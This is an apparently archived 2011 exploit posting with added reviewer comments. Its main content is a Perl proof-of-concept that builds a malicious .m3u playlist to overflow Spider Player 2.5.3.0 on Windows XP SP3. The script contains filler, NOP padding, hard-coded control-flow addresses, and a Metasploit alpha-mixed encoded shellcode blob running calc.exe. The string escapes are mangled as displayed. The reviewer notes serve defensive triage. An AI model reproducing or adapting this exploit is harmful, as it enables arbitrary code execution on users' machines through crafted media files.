Spider Player 2.5.3.0 Buffer Overflow
Posted on 21 August 2011
###
# Title     : Spider Player v2.5.3.0 (.m3u) Buffer Overflow Exploit
# Author    : KedAns-Dz (Inj3ct0r Team)
# Web Site  : www.1337day.com * www.exploit-id.com * www.dis9.com
# Platform  : windows
# Impact    : Buffer Overflow (in version 2.5.3.0)
# Tested on : Windows XP SP3 (Fr)
###
#
# Purpose: proof-of-concept generator. The script concatenates several
# strings and writes the result to a playlist file named
# DzOffendersCr3w.m3u in the current directory. According to the author's
# header, Spider Player 2.5.3.0 overflows a buffer when it parses such a
# file.
#
# NOTE(review): the hosting page has altered the original formatting (line
# breaks and string escapes). The listing below is kept exactly as the page
# displays it, not as a working tool.
#
# Defender notes:
#   - The payload comment states windows/exec with CMD=calc.exe, i.e. a
#     demonstration payload.
#   - The control-flow values are fixed and the author attributes one of them
#     to shell32.dll, so the PoC is presumably tied to the tested OS build
#     (Windows XP SP3 Fr). Address randomisation and non-executable stacks on
#     later systems would be expected to break it; confirm per target.
#   - An .m3u playlist is normally a short text list of paths. A playlist made
#     of tens of thousands of one repeated character followed by a dense
#     alphanumeric blob is a usable triage signal for mail and download
#     scanning.
#
#----------------------[ Exploit Code ]----------------=>
#!/usr/bin/perl
#-----------------
print " > Spider Player v2.5.3.0 (.m3u) Buffer Overflow Exploit < ";

# Layout pieces. The names are the author's labels for each part's role.
my $junk = "x41" x 31337;        # filler: the literal shown, repeated 31337 times
my $nops = "x90" x 55;           # padding: the literal shown, repeated 55 times
my $buf = "x41x42x43x44" x 3 ;   # short marker pattern, repeated 3 times
#-----------------
# windows/exec - 511 bytes (http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# EXITFUNC=process, CMD=calc.exe
# The blob is built by concatenating fixed-width string chunks. Its content is
# opaque here; the three lines above are the author's own description.
my $shellcode =
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx49" .
"x78x4cx49x45x50x43x30x47x70x45x30x4ex69x49" .
"x75x50x31x49x42x43x54x4ex6bx43x62x46x50x4e" .
"x6bx43x62x46x6cx4cx4bx42x72x44x54x4ex6bx50" .
"x72x45x78x44x4fx4dx67x43x7ax45x76x46x51x4b" .
"x4fx45x61x4fx30x4cx6cx47x4cx50x61x43x4cx44" .
"x42x44x6cx47x50x4ax61x4ax6fx46x6dx47x71x4b" .
"x77x4bx52x4cx30x43x62x51x47x4ex6bx51x42x44" .
"x50x4cx4bx47x32x45x6cx47x71x48x50x4ex6bx51" .
"x50x51x68x4cx45x4fx30x42x54x51x5ax43x31x48" .
"x50x50x50x4ex6bx50x48x45x48x4cx4bx46x38x51" .
"x30x47x71x4ax73x4bx53x47x4cx43x79x4ex6bx45" .
"x64x4ex6bx43x31x49x46x44x71x49x6fx45x61x4f" .
"x30x4cx6cx4bx71x48x4fx46x6dx47x71x4ax67x45" .
"x68x49x70x51x65x4cx34x44x43x43x4dx4ax58x47" .
"x4bx43x4dx46x44x50x75x4ax42x51x48x4cx4bx43" .
"x68x51x34x43x31x4ax73x42x46x4cx4bx46x6cx42" .
"x6bx4cx4bx50x58x45x4cx45x51x4ex33x4ex6bx45" .
"x54x4ex6bx43x31x4ex30x4cx49x50x44x45x74x46" .
"x44x43x6bx43x6bx43x51x42x79x42x7ax46x31x4b" .
"x4fx49x70x51x48x51x4fx50x5ax4cx4bx45x42x4a" .
"x4bx4dx56x51x4dx51x7ax43x31x4cx4dx4dx55x4c" .
"x79x47x70x45x50x45x50x46x30x45x38x44x71x4c" .
"x4bx50x6fx4ex67x49x6fx48x55x4dx6bx4ax50x4e" .
"x55x49x32x43x66x42x48x4cx66x4cx55x4dx6dx4d" .
"x4dx49x6fx4ex35x45x6cx47x76x43x4cx47x7ax4b" .
"x30x49x6bx4dx30x43x45x43x35x4dx6bx51x57x46" .
"x73x44x32x50x6fx42x4ax45x50x51x43x49x6fx4b" .
"x65x51x73x43x51x42x4cx51x73x44x6ex50x65x44" .
"x38x43x55x43x30x41x41";
#-----------------
# Two fixed control-flow values; the trailing comments are the author's
# annotations of what each is meant to hold.
my $eip = "x7Cx91xE5x14x90x90"; # JL SHORT / IN EAX / NOP / NOP
my $esp = "x07xd5xc5x7c"; # JMP ESP (shell32.dll)
#-----------------
# Final file content, in order: filler, padding, $eip, marker, eleven more
# padding units, $esp, payload. `x` binds tighter than `.`, so "x90" x 11 is
# repeated before it is concatenated.
# NOTE(review): $exploit is assigned without `my`, and the script does not
# enable strict or warnings.
$exploit = $junk.$nops.$eip.$buf."x90" x 11 .$esp.$shellcode;
#-----------------
print " [*] Creating Exploit File ... 
";
# NOTE(review): two-argument open with a fixed file name. The return values of
# open, print and close are not checked, so a failed write goes unreported.
open($DZ ,">DzOffendersCr3w.m3u");
print $DZ $exploit;
close($DZ);
#-----------------
print "[+] Exploit File Created (^_^) By KedAns-Dz ! ";
#-------------------------[ End ]-----------------------<<
# The original posting closes with a greetings list to Dz Offenders Cr3w,
# Inj3ct0r Team and Exploit-ID Team members and to several related sites.
